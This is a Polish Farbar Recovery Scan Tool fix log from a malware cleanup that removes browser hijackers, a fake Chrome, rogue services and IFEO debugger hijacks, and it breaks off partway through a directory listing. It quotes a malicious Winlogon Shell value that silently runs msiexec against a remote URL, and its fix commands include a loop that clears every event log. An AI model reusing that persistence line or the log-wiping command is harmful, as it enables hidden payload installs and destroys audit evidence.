Rezultat naprawy Farbar Recovery Scan Tool (x64) Wersja: 20-09-2017 Uruchomiony przez Julietta Stepaniak (21-09-2017 18:04:03) Run:1 Uruchomiony z C:\Users\media\Desktop Załadowane profile: Julietta Stepaniak (Dostępne profile: Julietta Stepaniak) Tryb startu: Normal ============================================== fixlist - zawartość: ***************** CloseProcesses: CreateRestorePoint: HKU\S-1-5-21-204455593-1543837664-2498303104-1001\...\ChromeHTML: -> "C:\Program Files (x86)\Doeye\Application\chrome.exe" "%1" <==== UWAGA Task: {2431548D-8098-462D-B275-F2D973A589D2} - System32\Tasks\CreateChoiceProcessTask => C:\Windows\BrowserChoice\browserchoice.exe C:\Program Files (x86)\Doeye C:\Users\media\AppData\Roaming\Doeye C:\Users\media\AppData\Local\Doeye HKU\S-1-5-21-204455593-1543837664-2498303104-1001\...\Run: [background_fault] => C:\Users\media\AppData\Local\background_fault\aswRD.exe [1419576 2017-05-27] (AVAST Software) <==== UWAGA HKU\S-1-5-21-204455593-1543837664-2498303104-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i hxxp://point.ltdmsjq.com/?data=zDlkMj8xFkEdFUM8NkVLNTF1MYUdRWZSOWM3RYYxOUUyFTY1RH== /q <==== UWAGA C:\Users\media\AppData\Local\background_fault IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe IFEO\taskmgr.exe: [Debugger] HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1492615606&z=89b2548e3c8f5097e107c97gbz4teofqeg7w2q2e8z&from=che0812&uid=SAMSUNGXMZMTD128HAFV-000_S15MNYBD726571 HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1492615606&z=89b2548e3c8f5097e107c97gbz4teofqeg7w2q2e8z&from=che0812&uid=SAMSUNGXMZMTD128HAFV-000_S15MNYBD726571 HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492615606&z=89b2548e3c8f5097e107c97gbz4teofqeg7w2q2e8z&from=che0812&uid=SAMSUNGXMZMTD128HAFV-000_S15MNYBD726571&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492615606&z=89b2548e3c8f5097e107c97gbz4teofqeg7w2q2e8z&from=che0812&uid=SAMSUNGXMZMTD128HAFV-000_S15MNYBD726571&q={searchTerms} HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1492615606&z=89b2548e3c8f5097e107c97gbz4teofqeg7w2q2e8z&from=che0812&uid=SAMSUNGXMZMTD128HAFV-000_S15MNYBD726571 HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1492615606&z=89b2548e3c8f5097e107c97gbz4teofqeg7w2q2e8z&from=che0812&uid=SAMSUNGXMZMTD128HAFV-000_S15MNYBD726571 HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492615606&z=89b2548e3c8f5097e107c97gbz4teofqeg7w2q2e8z&from=che0812&uid=SAMSUNGXMZMTD128HAFV-000_S15MNYBD726571&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492615606&z=89b2548e3c8f5097e107c97gbz4teofqeg7w2q2e8z&from=che0812&uid=SAMSUNGXMZMTD128HAFV-000_S15MNYBD726571&q={searchTerms} HKU\S-1-5-21-204455593-1543837664-2498303104-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1492615606&z=89b2548e3c8f5097e107c97gbz4teofqeg7w2q2e8z&from=che0812&uid=SAMSUNGXMZMTD128HAFV-000_S15MNYBD726571 HKU\S-1-5-21-204455593-1543837664-2498303104-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1492615606&z=89b2548e3c8f5097e107c97gbz4teofqeg7w2q2e8z&from=che0812&uid=SAMSUNGXMZMTD128HAFV-000_S15MNYBD726571 SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = SearchScopes: HKU\S-1-5-21-204455593-1543837664-2498303104-1001 -> {306586E7-F494-4E28-96D7-E8E9E9F6C4E5} URL = SearchScopes: HKU\S-1-5-21-204455593-1543837664-2498303104-1001 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = HKU\S-1-5-21-204455593-1543837664-2498303104-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Doeye\Application\chrome.exe <==== UWAGA S2 EastnessSU; "C:\Users\media\AppData\Local\Temp\f1510.tmp\BaofengUpdate_U.exe" /i [X] <==== UWAGA S3 iSafeKrnlBoot; system32\DRIVERS\iSafeKrnlBoot.sys [X] <==== UWAGA S1 iSafeNetFilter; system32\DRIVERS\iSafeNetFilter.sys [X] <==== UWAGA C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk C:\Users\media\AppData\Local\Microsoft\Windows\Application Shortcuts\SAMSUNGELECTRONICSCO.LTD.SamsungStory_3c1yjt4zspk6g\App.lnk C:\Users\media\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.Calendar.lnk C:\Users\media\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.Mail.lnk C:\Users\media\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.People.lnk C:\Users\media\AppData\Local\Microsoft\Windows\Application Shortcuts\A0762F4C.tvnplayer_h009t4rdk3q9m\App.lnk C:\Users\media\AppData\Local\Microsoft\Windows\Application Shortcuts\8A47CE85.SPlayer_8qmkzsjdagxzj\TMTMetroApp.lnk DeleteKey: HKCU\Software\Mozilla DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Mozilla DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins C:\Users\media\AppData\Local\Mozilla C:\Users\media\AppData\Roaming\Mozilla C:\Users\media\AppData\Roaming\Profiles C:\Program Files (x86)\Mozilla Firefox C:\ProgramData\Mozilla CMD: dir /a "C:\Program Files" CMD: dir /a "C:\Program Files (x86)" CMD: dir /a "C:\Program Files\Common Files\System" CMD: dir /a "C:\Program Files (x86)\Common Files\System" CMD: dir /a C:\ProgramData CMD: dir /a C:\Users\media\AppData\Local CMD: dir /a C:\Users\media\AppData\LocalLow CMD: dir /a C:\Users\media\AppData\Roaming CMD: netsh advfirewall reset Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"} Hosts: EmptyTemp: ***************** Procesy zostały pomyślnie zamknięte. Punkt przywracania został pomyślnie utworzony. HKU\S-1-5-21-204455593-1543837664-2498303104-1001_Classes\ChromeHTML => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{2431548D-8098-462D-B275-F2D973A589D2} => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2431548D-8098-462D-B275-F2D973A589D2} => klucz pomyślnie usunięto C:\WINDOWS\System32\Tasks\CreateChoiceProcessTask => pomyślnie przeniesiono HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\CreateChoiceProcessTask => klucz pomyślnie usunięto "C:\Program Files (x86)\Doeye" => nie znaleziono. "C:\Users\media\AppData\Roaming\Doeye" => nie znaleziono. "C:\Users\media\AppData\Local\Doeye" => nie znaleziono. HKU\S-1-5-21-204455593-1543837664-2498303104-1001\Software\Microsoft\Windows\CurrentVersion\Run\\background_fault => Wartość pomyślnie usunięto HKU\S-1-5-21-204455593-1543837664-2498303104-1001\Software\Microsoft\Windows\CurrentVersion\Policies\system\\Shell => Wartość pomyślnie usunięto C:\Users\media\AppData\Local\background_fault => pomyślnie przeniesiono HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\GoogleUpdate.exe => klucz pomyślnie usunięto HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\GoogleUpdaterService.exe => klucz pomyślnie usunięto HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\taskmgr.exe => klucz pomyślnie usunięto HKLM\Software\\Microsoft\Internet Explorer\Main\\Start Page => Wartość pomyślnie przywrócono HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Start Page => Wartość pomyślnie przywrócono HKLM\Software\\Microsoft\Internet Explorer\Main\\Search Page => Wartość pomyślnie przywrócono HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Search Page => Wartość pomyślnie przywrócono HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Page_URL => Wartość pomyślnie przywrócono HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Default_Page_URL => Wartość pomyślnie przywrócono HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Search_URL => Wartość pomyślnie przywrócono HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Default_Search_URL => Wartość pomyślnie przywrócono HKU\S-1-5-21-204455593-1543837664-2498303104-1001\Software\Microsoft\Internet Explorer\Main\\Start Page => Wartość pomyślnie przywrócono HKU\S-1-5-21-204455593-1543837664-2498303104-1001\Software\Microsoft\Internet Explorer\Main\\Default_Page_URL => Wartość pomyślnie przywrócono HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => Wartość pomyślnie przywrócono HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => klucz pomyślnie usunięto HKLM\Software\Classes\CLSID\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => klucz nie znaleziono. HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => Wartość pomyślnie przywrócono HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => klucz pomyślnie usunięto HKLM\Software\Wow6432Node\Classes\CLSID\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => klucz nie znaleziono. HKU\S-1-5-21-204455593-1543837664-2498303104-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{306586E7-F494-4E28-96D7-E8E9E9F6C4E5} => klucz pomyślnie usunięto HKLM\Software\Classes\CLSID\{306586E7-F494-4E28-96D7-E8E9E9F6C4E5} => klucz nie znaleziono. HKU\S-1-5-21-204455593-1543837664-2498303104-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => klucz pomyślnie usunięto HKLM\Software\Classes\CLSID\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => klucz nie znaleziono. HKU\S-1-5-21-204455593-1543837664-2498303104-1001\SOFTWARE\Clients\StartMenuInternet\ChromeHTML => klucz pomyślnie usunięto HKLM\System\CurrentControlSet\Services\EastnessSU => klucz pomyślnie usunięto EastnessSU => serwis pomyślnie usunięto iSafeKrnlBoot => serwis nie znaleziono. iSafeNetFilter => serwis nie znaleziono. C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk => pomyślnie przeniesiono C:\Users\media\AppData\Local\Microsoft\Windows\Application Shortcuts\SAMSUNGELECTRONICSCO.LTD.SamsungStory_3c1yjt4zspk6g\App.lnk => pomyślnie przeniesiono C:\Users\media\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.Calendar.lnk => pomyślnie przeniesiono C:\Users\media\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.Mail.lnk => pomyślnie przeniesiono C:\Users\media\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.People.lnk => pomyślnie przeniesiono C:\Users\media\AppData\Local\Microsoft\Windows\Application Shortcuts\A0762F4C.tvnplayer_h009t4rdk3q9m\App.lnk => pomyślnie przeniesiono C:\Users\media\AppData\Local\Microsoft\Windows\Application Shortcuts\8A47CE85.SPlayer_8qmkzsjdagxzj\TMTMetroApp.lnk => pomyślnie przeniesiono HKCU\Software\Mozilla => klucz pomyślnie usunięto HKCU\Software\MozillaPlugins => klucz pomyślnie usunięto HKLM\SOFTWARE\Mozilla => klucz pomyślnie usunięto HKLM\SOFTWARE\MozillaPlugins => klucz nie znaleziono. HKLM\SOFTWARE\Wow6432Node\Mozilla => klucz pomyślnie usunięto HKLM\SOFTWARE\Wow6432Node\mozilla.org => klucz nie znaleziono. HKLM\SOFTWARE\Wow6432Node\MozillaPlugins => klucz pomyślnie usunięto "C:\Users\media\AppData\Local\Mozilla" => nie znaleziono. C:\Users\media\AppData\Roaming\Mozilla => pomyślnie przeniesiono "C:\Users\media\AppData\Roaming\Profiles" => nie znaleziono. "C:\Program Files (x86)\Mozilla Firefox" => nie znaleziono. "C:\ProgramData\Mozilla" => nie znaleziono. ========= dir /a "C:\Program Files" ========= Volume in drive C has no label. Volume Serial Number is 2C17-11ED Directory of C:\Program Files 2017-09-21 13:53